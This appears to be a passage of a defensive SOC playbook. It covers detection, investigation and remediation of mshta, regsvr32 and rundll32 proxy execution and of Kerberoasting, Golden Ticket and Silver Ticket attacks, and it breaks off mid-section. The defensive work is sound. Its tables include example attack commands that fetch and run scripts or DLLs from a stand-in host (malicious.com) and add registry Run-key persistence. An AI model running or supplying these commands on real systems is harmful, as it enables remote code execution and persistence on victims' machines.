part 2

some of SOPs

🚨 Signed Binary Proxy Execution - mshta.exe

🔍 1. Attack Breakdown

📝 What is mshta.exe?

• mshta.exe (Microsoft HTML Application Host) is a legitimate Windows binary used to execute HTA (HTML Application) files.

• It supports scripting languages like VBScript and JavaScript.

📑 Why Attackers Abuse mshta.exe?

• Signed Binary: Trusted by Windows, can bypass application whitelisting.

• Supports Remote Scripts: Can directly execute scripts hosted on malicious servers.

• Fileless Attacks: Scripts can run entirely in memory.

• Proxy Execution: Execute malicious payloads indirectly.

---

📌 Common Malicious Uses of mshta.exe

Technique	Example Command	Purpose
Remote Script Execution	mshta.exe http://malicious.com/script.hta	Execute script from external URL.
Encoded Script Execution	mshta.exe vbscript:Execute("cmd /c calc.exe")	Run commands using VBScript.
Obfuscated Payload	mshta.exe "javascript:eval('base64_encoded_payload')"	Execute encoded payloads.
Persistence Mechanism	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "mshta.exe C:\temp\payload.hta"	Add registry persistence.

---

🛡️ 2. Detection Techniques

📊 Manual Inspection

🕵️ Check for Active mshta.exe Processes

Get-Process -Name mshta

🕵️ Check Command-Line History for mshta.exe

Get-History | Where-Object { $_.CommandLine -match "mshta" }

🕵️ List Remote Connections by mshta.exe

Get-NetTCPConnection | Where-Object { $_.OwningProcess -eq (Get-Process -Name mshta).Id }

---

📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect mshta.exe Executions

DeviceProcessEvents
| where FileName == "mshta.exe"
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, AccountName

🕵️ Detect Remote Script Execution via mshta.exe

DeviceProcessEvents
| where FileName == "mshta.exe"
| where ProcessCommandLine contains "http"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

🕵️ Identify Encoded or Obfuscated Payloads

DeviceProcessEvents
| where FileName == "mshta.exe"
| where ProcessCommandLine matches regex "(?i)base64|eval|vbscript"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

🕵️ Identify Network Activity from mshta.exe

DeviceNetworkEvents
| where InitiatingProcessFileName == "mshta.exe"
| where RemoteIP != "127.0.0.1"
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, ProcessCommandLine

---

📊 Event Viewer Logs

• Event ID 4688: Process Creation

• Event ID 4104: Script Block Logging

• Event ID 5156: Network Connection Allowed

Filter Example:

• Open Event Viewer → Windows Logs → Security

• Search for:

  Process Name: mshta.exe
  Command Line: http, vbscript, eval

---

🕵️ 3. Investigation Techniques

1️⃣ Inspect Command Line Arguments

• Identify URLs, encoded commands, or file paths:

Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "mshta.exe" } | Select-Object CommandLine

---

2️⃣ Check Remote Connections

• List outbound network connections:

netstat -ano | findstr :80
netstat -ano | findstr :443

---

3️⃣ Validate Remote URLs or IPs

• Verify IPs or domains with VirusTotal, AbuseIPDB, or Shodan:

Invoke-RestMethod -Uri "https://ipinfo.io/<RemoteIP>"

---

4️⃣ Inspect Registry Persistence

• Look for startup entries using mshta.exe:

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

---

5️⃣ Analyze HTA Files

• Check downloaded .hta files:

Get-ChildItem -Path "C:\Temp" -Filter "*.hta"
Get-Content "C:\Temp\script.hta"

---

🔧 4. Remediation Steps

📌 1. Terminate Suspicious Processes

Stop-Process -Name mshta -Force

📌 2. Block Outbound Traffic

New-NetFirewallRule -DisplayName "Block mshta Public Traffic" -Direction Outbound -RemoteAddress "<Suspicious IP>" -Action Block

📌 3. Remove Registry Persistence

Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "malicious"

📌 4. Quarantine Malicious Files

Move-Item -Path "C:\Temp\malicious.hta" -Destination "C:\Quarantine"

📌 5. Perform Full Antivirus Scan

Start-MpScan -ScanType FullScan

---

🛡️ 5. Prevention Steps

1. Restrict Execution of mshta.exe:

   • Block it via AppLocker or WDAC.

2. Monitor Remote Script Executions:

   • Alert for mshta.exe executing remote scripts.

3. Enable Script Block Logging:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1

1. Enable Attack Surface Reduction (ASR) Rules:

Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

1. Monitor Non-Standard Execution Paths:

   • Ensure HTA files are not executed from Temp or AppData.

2. Educate Users:

   • Train users to avoid clicking on .hta files from unknown sources.

---

🧠 6. Key Takeaways

• Monitor HTTP/S Connections: mshta.exe rarely communicates with public IPs.

• Obfuscation Detection: Look for Base64 and JavaScript commands.

• Registry Analysis: Watch for mshta.exe in Run keys.

• Disable Unused Binaries: Block execution of mshta.exe if not needed.

---

🚨 Signed Binary Proxy Execution - regsvr32.exe

🔍 1. Attack Breakdown

📝 What is regsvr32.exe?

• regsvr32.exe (Microsoft Register Server) is a legitimate Windows utility used to register or unregister DLL files in the Windows Registry.

• It supports remote loading of DLLs and scriptlets via URLs.

📑 Why Attackers Abuse regsvr32.exe?

• Signed Binary: Trusted by Windows and bypasses security controls.

• Remote Payload Loading: Can load remote scripts or DLLs.

• Proxy Execution: Run malicious code indirectly.

• Fileless Attacks: Execute payloads in memory without leaving traces on disk.

---

📌 Common Malicious Uses of regsvr32.exe

Technique	Example Command	Purpose
Remote Script Execution	regsvr32.exe /s /u /i:http://malicious.com/script.sct scrobj.dll	Load and execute remote script.
Local DLL Execution	regsvr32.exe /s malicious.dll	Load and execute local DLL payload.
Encoded Payload Execution	regsvr32.exe /u /n /i:"javascript:eval('Base64Payload')" scrobj.dll	Execute encoded JavaScript payload.
Persistence Mechanism	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persist /t REG_SZ /d "regsvr32.exe /i:http://malicious.com/payload.sct"	Add persistence in registry.

---

🛡️ 2. Detection Techniques

📊 Manual Inspection

🕵️ Check Running Instances of regsvr32.exe:

Get-Process -Name regsvr32 -IncludeUserName | Select-Object ProcessName, Id, Path, StartTime

🕵️ List Recent Commands Containing regsvr32.exe:

Get-History | Where-Object { $_.CommandLine -match "regsvr32" }

🕵️ Identify Suspicious Network Connections:

Get-NetTCPConnection | Where-Object { $_.OwningProcess -eq (Get-Process -Name regsvr32).Id }

---

📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect regsvr32.exe Execution:

DeviceProcessEvents
| where FileName == "regsvr32.exe"
| project Timestamp, DeviceName, ProcessCommandLine, FolderPath, AccountName

🕵️ Detect Remote Payload Execution via regsvr32.exe:

DeviceProcessEvents
| where FileName == "regsvr32.exe"
| where ProcessCommandLine contains "http"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

🕵️ Identify Encoded or Obfuscated Payloads:

DeviceProcessEvents
| where FileName == "regsvr32.exe"
| where ProcessCommandLine matches regex "(?i)javascript|eval|Base64"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

🕵️ Detect regsvr32.exe Communicating with Public IP:

DeviceNetworkEvents
| where InitiatingProcessFileName == "regsvr32.exe"
| where RemoteIP != "127.0.0.1"
| where RemoteIP != "::1"
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, ProcessCommandLine

---

📊 Event Viewer Logs

• Event ID 4688: Process Creation

• Event ID 4104: Script Block Logging (PowerShell)

• Event ID 5156: Network Connection Allowed

Filter Example:

• Open Event Viewer → Windows Logs → Security

• Search for:

  Process Name: regsvr32.exe
  Process Command Line: http, javascript, eval

---

🕵️ 3. Investigation Techniques

1️⃣ Inspect Command Line Arguments

• Identify URLs, encoded commands, or file paths:

Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "regsvr32.exe" } | Select-Object CommandLine

---

2️⃣ Validate Remote URLs or IPs

• Verify IPs or domains with VirusTotal, AbuseIPDB, or Shodan:

pInvoke-RestMethod -Uri "https://ipinfo.io/<RemoteIP>"

---

3️⃣ Trace Parent Processes

• Identify the parent process that triggered regsvr32.exe:

Get-CimInstance Win32_Process | Where-Object { $_.ProcessId -eq <PID> } | Select-Object ParentProcessId

---

4️⃣ Analyze Network Traffic

• Monitor outbound connections initiated by regsvr32.exe:

netstat -ano | findstr :80
netstat -ano | findstr :443

---

5️⃣ Inspect Registry for Persistence

• Look for startup entries involving regsvr32.exe:

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

---

🔧 4. Remediation Steps

📌 1. Terminate Suspicious Processes

Stop-Process -Name regsvr32 -Force

📌 2. Block Outbound Traffic

New-NetFirewallRule -DisplayName "Block regsvr32 Public Traffic" -Direction Outbound -RemoteAddress "<Suspicious IP>" -Action Block

📌 3. Remove Registry Persistence

Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "malicious"

📌 4. Quarantine Malicious Files

Move-Item -Path "C:\Temp\malicious.dll" -Destination "C:\Quarantine"

📌 5. Perform Full Antivirus Scan

Start-MpScan -ScanType FullScan

---

🛡️ 5. Prevention Steps

1. Restrict Execution of regsvr32.exe:

   • Block it via AppLocker or WDAC.

2. Monitor Remote Script Executions:

   • Alert for regsvr32.exe executing remote scripts.

3. Enable Script Block Logging:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1

1. Enable Attack Surface Reduction (ASR) Rules:

Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

1. Monitor Non-Standard Execution Paths:

   • Ensure DLLs are not executed from Temp or AppData.

2. Educate Users:

   • Avoid opening unknown .dll or .sct files.

---

🧠 6. Key Takeaways

• Monitor HTTP/S Connections: regsvr32.exe rarely communicates with public IPs.

• Obfuscation Detection: Look for javascript, eval, and Base64 encoding.

• Registry Analysis: Watch for regsvr32.exe entries in Run keys.

• Disable Unused Binaries: If not needed, disable regsvr32.exe.

---

🚨 Signed Binary Proxy Execution - rundll32.exe

🔍 1. Attack Breakdown

📝 What is rundll32.exe?

• rundll32.exe is a legitimate Windows binary used to load and execute DLL (Dynamic Link Library) files.

• It can execute exported functions from DLLs and execute JavaScript/VBScript with certain arguments.

📑 Why Attackers Abuse rundll32.exe?

• Signed Binary: Trusted by Windows, often bypasses security monitoring tools.

• Proxy Execution: Executes malicious DLL payloads indirectly.

• Remote Execution: Can load DLLs or scripts from remote locations.

• Fileless Attacks: Executes payloads directly in memory.

• Obfuscation Potential: Commands can be heavily obfuscated.

---

📌 Common Malicious Uses of rundll32.exe

Technique	Example Command	Purpose
Execute DLL Function	rundll32.exe C:\malicious.dll,EntryPoint	Execute exported DLL function.
Remote DLL Execution	rundll32.exe http://malicious.com/payload.dll,EntryPoint	Execute remote payload.
Fileless Execution	rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write('...')	Execute JavaScript in memory.
PowerShell Execution	rundll32.exe PowrProf.dll, SetSuspendState	Abuse legitimate DLLs for code execution.
Persistence Mechanism	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persist /t REG_SZ /d "rundll32.exe C:\Temp\payload.dll,EntryPoint"	Add persistence via registry.

---

🛡️ 2. Detection Techniques

📊 Manual Inspection

🕵️ List Active rundll32.exe Processes

Get-Process -Name rundll32 | Select-Object ProcessName, Id, Path, StartTime

🕵️ Check Suspicious Command Lines

Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object { $_.Message -match "rundll32" }

🕵️ Check Recently Created DLLs

Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\<User>\AppData\Local\Temp" -Filter "*.dll" -Recurse

---

📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect rundll32.exe Executions

DeviceProcessEvents
| where FileName == "rundll32.exe"
| project Timestamp, DeviceName, ProcessCommandLine, FolderPath, AccountName

🕵️ Detect Remote Payload Execution

DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "http"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

🕵️ Identify Encoded or Obfuscated Commands

DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine matches regex "(?i)javascript|eval|base64"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

🕵️ Monitor Network Connections by rundll32.exe

DeviceNetworkEvents
| where InitiatingProcessFileName == "rundll32.exe"
| where RemoteIP != "127.0.0.1"
| where RemoteIP != "::1"
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, ProcessCommandLine

---

📊 Event Viewer Logs

• Event ID 4688: Process Creation

• Event ID 5156: Network Connection Allowed

• Event ID 4104: PowerShell Script Block Logging

Filter Example:

• Open Event Viewer → Windows Logs → Security

• Search for:

  Process Name: rundll32.exe
  Command Line: http, javascript, base64

---

🕵️ 3. Investigation Techniques

1️⃣ Inspect Command Line Arguments

• Analyze the full command line:

Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "rundll32.exe" } | Select-Object CommandLine

---

2️⃣ Trace Parent Processes

• Identify the parent process:

Get-CimInstance Win32_Process | Where-Object { $_.ProcessId -eq <PID> } | Select-Object ParentProcessId

---

3️⃣ Validate Remote IPs/URLs

• Verify URLs and IPs using VirusTotal or AbuseIPDB:

Invoke-RestMethod -Uri "https://ipinfo.io/<RemoteIP>"

---

4️⃣ Analyze DLLs

• Check metadata and contents of the DLL:

Get-Item "C:\Temp\malicious.dll" | Select-Object Name, CreationTime, LastWriteTime

• Dump and analyze:

Get-Content "C:\Temp\malicious.dll"

---

5️⃣ Check Registry for Persistence

• Look for rundll32.exe entries in Run keys:

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

---

🔧 4. Remediation Steps

📌 1. Terminate Suspicious Processes

Stop-Process -Name rundll32 -Force

📌 2. Block Outbound Traffic

New-NetFirewallRule -DisplayName "Block rundll32 Public Traffic" -Direction Outbound -RemoteAddress "<Suspicious IP>" -Action Block

📌 3. Remove Registry Persistence

Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "malicious"

📌 4. Quarantine Suspicious DLLs

Move-Item -Path "C:\Temp\malicious.dll" -Destination "C:\Quarantine"

📌 5. Perform Full Antivirus Scan

Start-MpScan -ScanType FullScan

---

🛡️ 5. Prevention Steps

1. Restrict Execution of rundll32.exe:

   • Block non-standard DLL execution via AppLocker or WDAC.

2. Monitor Remote Script Execution:

   • Create alerts for remote DLL execution.

3. Enable Script Block Logging:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1

1. Enable Attack Surface Reduction (ASR) Rules:

Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

1. Monitor Non-Standard Execution Paths:

   • Prevent DLL execution from Temp and AppData.

2. User Awareness Training:

   • Educate users about malicious DLLs.

---

🧠 6. Key Takeaways

• Proxy Execution: rundll32.exe can proxy malicious DLL execution.

• Monitor Outbound Connections: Look for public IP communication.

• Obfuscation Patterns: Detect javascript, base64, or remote URLs.

• Registry Auditing: Watch for rundll32.exe in Run keys.

---

🚨 Kerberoasting Attack: Advanced Threat Analysis

🔍 1. Attack Breakdown

📝 What is Kerberoasting?

• Kerberoasting is an attack targeting Service Principal Names (SPNs) in an Active Directory (AD) environment.

• Attackers exploit weak service account passwords by requesting Kerberos Ticket Granting Service (TGS) tickets and attempting to crack the hash offline.

📑 Why Attackers Use Kerberoasting?

• No Elevated Privileges Required: Any domain user can request SPN tickets.

• Offline Hash Cracking: Allows attackers to crack hashes without interacting with the domain.

• No Account Lockouts: Offline cracking prevents triggering account lockouts.

• Privilege Escalation: Successful password cracking may grant access to privileged accounts.

---

📌 Attack Phases

1️⃣ Enumeration: Identify service accounts with SPNs using tools like setspn, PowerShell, or LDAP queries. 2️⃣ Request TGS Tickets: Use tools like Rubeus, Impacket, or PowerView to request Kerberos tickets for service accounts. 3️⃣ Extract Ticket Hashes: Extract the RC4-HMAC hashes from the tickets. 4️⃣ Crack Hashes Offline: Use tools like John the Ripper or Hashcat to crack the extracted hashes. 5️⃣ Lateral Movement: Use cracked credentials for lateral movement and privilege escalation.

---

📊 Tools Commonly Used in Kerberoasting

Tool	Purpose
Rubeus	Kerberos ticket manipulation and extraction
Impacket (GetUserSPNs.py)	Enumerate and request SPN tickets
PowerView	Enumerate SPNs via PowerShell
Kerberoast	Extract and crack Kerberos tickets
Hashcat	Offline password cracking
John the Ripper	Offline password cracking

---

🛡️ 2. Detection Techniques

📊 Manual Detection with PowerShell

🕵️ Identify SPNs in Active Directory

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object Name, ServicePrincipalName

🕵️ Monitor Kerberos Ticket Requests (Event ID 4769)

• Open Event Viewer → Windows Logs → Security → Filter by Event ID 4769

• Look for:

  • Service Name: Suspicious or high-value accounts

  • Encryption Type: 0x17 (RC4-HMAC) is common in Kerberoasting

🕵️ Check for Excessive TGS Requests

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Where-Object { $_.Message -match "0x17" }

---

📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Excessive TGS Requests

SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"
| summarize count() by AccountName, IpAddress
| where count_ > 10

🕵️ Identify Suspicious SPN Enumeration

DeviceProcessEvents
| where FileName contains "powershell.exe" or FileName contains "rubeus.exe"
| where ProcessCommandLine contains "kerberoast" or ProcessCommandLine contains "getuserspns"
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName

🕵️ Monitor Hash Extraction Tools

DeviceFileEvents
| where FileName contains "hashcat" or FileName contains "john"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName

---

📊 Event Viewer Logs

• Event ID 4769: Kerberos Service Ticket Request

• Event ID 4625: Failed Login Attempt (if lateral movement follows Kerberoasting)

• Event ID 4648: Logon with Explicit Credentials

📌 Look for Key Indicators:

• Ticket encryption type: 0x17 (RC4-HMAC)

• Excessive TGS requests from a single IP address or account

---

🕵️ 3. Investigation Techniques

1️⃣ Identify Target Accounts

• Check high-privilege accounts with SPNs:

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Where-Object {$_.Enabled -eq $true}

---

2️⃣ Trace IP Address of Ticket Requests

• Investigate IP addresses making frequent TGS requests:

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Where-Object { $_.Properties[2].Value -match "0x17" }

---

3️⃣ Analyze Tools Used

• Look for tools like Rubeus.exe, impacket, powershell.exe with Kerberoasting commands.

---

4️⃣ Check Offline Password Cracking Activity

• Monitor tools like John the Ripper, Hashcat, or massive hash dump files in Temp or AppData.

---

5️⃣ Investigate Credential Use Post-Cracking

• Check Event Logs for lateral movement:

  • Event ID 4624: Successful Logon

  • Event ID 4634: Logoff

  • Event ID 4661: Access to objects

---

🔧 4. Remediation Steps

📌 1. Reset Compromised Account Passwords

• Change passwords for all suspected service accounts.

• Ensure passwords are long and complex.

📌 2. Enable Kerberos AES Encryption

• Disable RC4 encryption in Kerberos:

Set-ADAccountControl -Identity <ServiceAccount> -KerberosEncryptionType AES256

📌 3. Audit Service Accounts

• Ensure service accounts follow the least privilege principle.

• Avoid excessive SPNs.

📌 4. Monitor for Tools and Scripts

• Block Rubeus, Impacket, and other Kerberoasting tools.

📌 5. Enable Account Lockout Policy

• Implement an account lockout policy to detect brute-force attempts.

---

🛡️ 5. Prevention Steps

1. Strong Service Account Passwords:

   • At least 25+ characters with uppercase, lowercase, numbers, and symbols.

2. Disable Unused SPNs:

Set-ADUser -Identity <Account> -ServicePrincipalNames @{Remove="SPN"}

1. Enable Kerberos AES Encryption:

   • Avoid RC4 encryption.

2. Implement Group Managed Service Accounts (gMSA):

   • Use gMSAs for service accounts.

3. Real-Time Monitoring for TGS Requests:

   • Configure SIEM alerts for Event ID 4769 with RC4-HMAC.

4. Use Managed Security Solutions:

   • Solutions like Microsoft Defender for Identity (MDI) or CrowdStrike Falcon.

---

🧠 6. Key Takeaways

• Encryption Matters: Avoid RC4 encryption in Kerberos tickets.

• Audit Service Accounts: Remove unnecessary SPNs.

• Monitor TGS Requests: Look for repeated requests with RC4-HMAC encryption.

• Offline Cracking Is Silent: Focus on ticket requests, not brute-force attempts.

• Account Hygiene: Strong, unique passwords for service accounts.

---

🚨 Golden Ticket Attack: Advanced Threat Analysis

🔍 1. Attack Breakdown

📝 What is a Golden Ticket Attack?

• A Golden Ticket Attack is a post-exploitation technique where an attacker forges a Kerberos Ticket Granting Ticket (TGT) using the KRBTGT account hash.

• With a Golden Ticket, an attacker can impersonate any user, including domain admins, and gain unrestricted access to the Active Directory (AD) environment.

📑 Why Attackers Use Golden Tickets?

• Unlimited Access: Gain access to any resource in the domain.

• Persistence: Golden Tickets remain valid even after password resets for regular accounts.

• Stealth: Hard to detect without specialized monitoring.

• Flexibility: Can create TGTs for any user, SID, or privilege level.

🛡️ Requirements for a Golden Ticket Attack:

1. Domain Admin Access: Required to extract the krbtgt NTLM hash.

2. Domain SID: Security Identifier of the domain.

3. KRBTGT Account Hash: Extracted using tools like Mimikatz.

4. Domain Name: FQDN of the domain.

📌 Attack Steps:

1️⃣ Compromise Domain Admin Account: Gain access to an account with sufficient privileges. 2️⃣ Extract KRBTGT Hash: Use tools like Mimikatz to dump the KRBTGT hash. 3️⃣ Forge a TGT: Create a fake TGT using the extracted hash. 4️⃣ Impersonate Any User: Use the forged TGT to access domain resources. 5️⃣ Lateral Movement & Persistence: Move laterally across the network, maintain persistence.

---

📊 Common Tools Used in Golden Ticket Attacks

Tool	Purpose
Mimikatz	Dump KRBTGT hash and forge Golden Tickets
Rubeus	Kerberos ticket manipulation
Impacket	Pass-the-Ticket attacks
Responder	Lateral movement and credential harvesting
PowerSploit	Credential extraction and ticket manipulation

---

🛡️ 2. Detection Techniques

📊 Manual Detection with PowerShell

🕵️ Check KRBTGT Account Modifications

Get-ADUser -Identity krbtgt -Properties LastLogonDate, PasswordLastSet

• Red Flag: PasswordLastSet hasn't been changed in a long time.

🕵️ Look for Suspicious TGT Requests

• Monitor Event ID 4769 for abnormal activity.

🕵️ Check for Unusual Privileges in Kerberos Tickets

klist tickets

• Look for tickets with abnormally long lifetimes or unusual user SIDs.

---

📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Suspicious Kerberos TGT Requests

SecurityEvent
| where EventID == 4769
| where TicketOptions contains "0x40810000" // Indicates forged tickets
| project Timestamp, DeviceName, AccountName, IpAddress

🕵️ Identify Abnormal KRBTGT Activity

DeviceProcessEvents
| where InitiatingProcessFileName contains "mimikatz" or InitiatingProcessCommandLine contains "kerberos::golden"
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName

🕵️ Look for Long-Lived Kerberos Tickets

SecurityEvent
| where EventID == 4769
| where TicketLifetime > 10h
| project Timestamp, DeviceName, AccountName, TicketLifetime

🕵️ Identify NTLM Hash Dumps

DeviceProcessEvents
| where ProcessCommandLine contains "lsass.exe" or ProcessCommandLine contains "dump"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName

---

📊 Event Viewer Logs

Event ID	Description
4768	TGT was requested
4769	Service ticket was requested
4771	Kerberos pre-authentication failed
4624	Successful account logon

🕵️ Focus on Event ID 4768 and 4769

• Look for tickets with unusually long lifetimes.

• Check for tickets issued to non-standard accounts (e.g., non-admin accounts with high privileges).

---

🕵️ 3. Investigation Techniques

1️⃣ Inspect KRBTGT Account Activity

• Check if the KRBTGT account has been accessed or its password has been reset.

2️⃣ Trace Kerberos Tickets

• Look for unusual ticket lifetimes:

klist tickets

3️⃣ Analyze Ticket Requests

• Check accounts requesting service tickets frequently:

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769}

4️⃣ Monitor High-Privilege Accounts

• Look for high-privilege accounts being accessed from unfamiliar systems.

5️⃣ Identify Tool Artifacts

• Look for mimikatz.exe, rubeus.exe, or unusual PowerShell commands.

---

🔧 4. Remediation Steps

📌 1. Reset the KRBTGT Account Twice

• Reset the KRBTGT account password twice to invalidate all existing Kerberos tickets:

Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "NewSecurePassword!" -Force)

• Wait for replication across all Domain Controllers.

📌 2. Revoke Active Kerberos Tickets

• Invalidate existing tickets:

klist purge

📌 3. Remove Malicious Tickets

• Reboot affected systems to clear all cached tickets.

📌 4. Audit Domain Admin Accounts

• Check for unauthorized activity across all Domain Admin accounts.

📌 5. Update and Patch Systems

• Ensure Domain Controllers and Kerberos servers are up-to-date.

📌 6. Conduct Full Antivirus Scan

Start-MpScan -ScanType FullScan

---

🛡️ 5. Prevention Steps

1. Regular KRBTGT Password Resets:

   • Rotate KRBTGT passwords at least every 180 days.

2. Enable Monitoring for Admin Activities:

   • Track login attempts and service ticket requests.

3. Use Managed Service Accounts (gMSA):

   • Reduce reliance on static service accounts.

4. Enable Windows Defender Credential Guard:

Enable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-Credential-Guard

1. Enable SIEM Alerts for KRBTGT Access:

   • Alerts for access attempts on KRBTGT accounts.

2. Restrict Domain Admin Access:

   • Limit Domain Admin usage to secure workstations.

---

🧠 6. Key Takeaways

• KRBTGT Hash is a Crown Jewel: Protect it at all costs.

• Golden Ticket = Unlimited Access: Immediate remediation is critical.

• Reset KRBTGT Twice: Ensure old tickets are invalidated.

• Continuous Monitoring: Monitor Event IDs 4768, 4769, and ticket anomalies.

• Least Privilege: Limit Domain Admin account access and usage.

---

🚨 Silver Ticket Attack

🔍 1. Attack Breakdown

📝 What is a Silver Ticket Attack?

• A Silver Ticket attack is a Kerberos attack where an attacker forges a Ticket Granting Service (TGS) ticket for a specific service on a server.

• Unlike Golden Ticket attacks, which target the KRBTGT account hash, Silver Ticket attacks target service account hashes (e.g., SQL Server, CIFS, HTTP, etc.).

📑 Why Attackers Use Silver Tickets?

• No Domain Controller Communication: The forged TGS is validated directly by the target service, bypassing the Domain Controller.

• Service-Level Access: Attackers gain direct access to the specific service they target.

• Stealth: Since it bypasses the Domain Controller, detection is more difficult.

• Persistence: Valid TGS tickets can grant long-term access if service account passwords are not changed.

---

📌 Attack Steps:

1️⃣ Enumerate Service Accounts: Identify service accounts (e.g., CIFS, MSSQLSvc, HTTP) using tools like PowerView or ADExplorer. 2️⃣ Extract Service Account Hash: Use tools like Mimikatz, Impacket, or Rubeus to dump the NTLM hash of the target service account. 3️⃣ Forge TGS Ticket: Generate a fake TGS using the extracted hash with tools like Mimikatz or Rubeus. 4️⃣ Inject the Ticket: Inject the forged ticket into the current session. 5️⃣ Access the Target Service: Authenticate to the service using the forged ticket.

---

📊 Common Tools for Silver Ticket Attacks

Tool	Purpose
Mimikatz	Create and inject Silver Tickets
Rubeus	Kerberos ticket manipulation
Impacket	Exploit service tickets and hashes
PowerView	Enumerate AD services and accounts
Kerberoast	Extract service account credentials

---

🛡️ 2. Detection Techniques

📊 Manual Detection with PowerShell

🕵️ Check Service Tickets with Suspicious Properties

klist tickets

• Look for:

  • Unusually long ticket lifetimes

  • Unexpected usernames

  • Odd service names

🕵️ Monitor Event Logs for TGS Requests (Event ID 4769)

• Open Event Viewer → Security → Filter by Event ID 4769

• Look for:

  • Encryption Type: RC4-HMAC (0x17) (often used in Silver Ticket attacks)

  • Service Name: Unusual or high-value services (e.g., MSSQLSvc, CIFS)

🕵️ Inspect NTLM Hashes

• Check for hash extraction activities:

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662}

---

📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Suspicious Service Ticket Requests

SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17" // RC4-HMAC
| where ServiceName in ("MSSQLSvc", "CIFS", "HTTP")
| project Timestamp, DeviceName, AccountName, ServiceName, IpAddress

🕵️ Identify Forged Tickets (No Pre-Authentication)

SecurityEvent
| where EventID == 4769
| where FailureReason == "Pre-authentication not required"
| project Timestamp, DeviceName, AccountName, ServiceName, IpAddress

🕵️ Look for Mimikatz/Rubeus Indicators

DeviceProcessEvents
| where FileName in~ ("mimikatz.exe", "rubeus.exe")
| where ProcessCommandLine contains "silver"
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName

🕵️ Detect Anomalous Ticket Lifetimes

SecurityEvent
| where EventID == 4769
| where TicketOptions contains "0x40810000"
| where AccountName != "krbtgt"
| project Timestamp, DeviceName, AccountName, TicketOptions, ServiceName

---

📊 Event Viewer Logs

Event ID	Description
4769	Service Ticket Request
4624	Account Logon
4771	Kerberos Pre-authentication failed
4662	Object Access (Indicates potential hash dumping)

📌 Focus on Event ID 4769:

• Look for Service Name anomalies.

• Monitor RC4-HMAC Encryption usage.

• Look for large ticket lifetimes.

---

🕵️ 3. Investigation Techniques

1️⃣ Validate TGS Ticket Requests

• Check accounts frequently requesting TGS tickets for specific services:

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769}

2️⃣ Identify Hash Dumping Activities

• Look for NTLM hash dumps:

Get-EventLog -LogName Security -InstanceId 4662 | Select-String "NTLM"

3️⃣ Trace Service Account Usage

• Monitor service account activity:

Get-ADUser -Identity ServiceAccountName -Properties LastLogonDate

4️⃣ Analyze Service Ticket Lifetimes

• Compare standard ticket lifetimes with anomalies:

klist tickets

5️⃣ Validate Source IP Addresses

• Identify anomalous IP addresses requesting tickets:

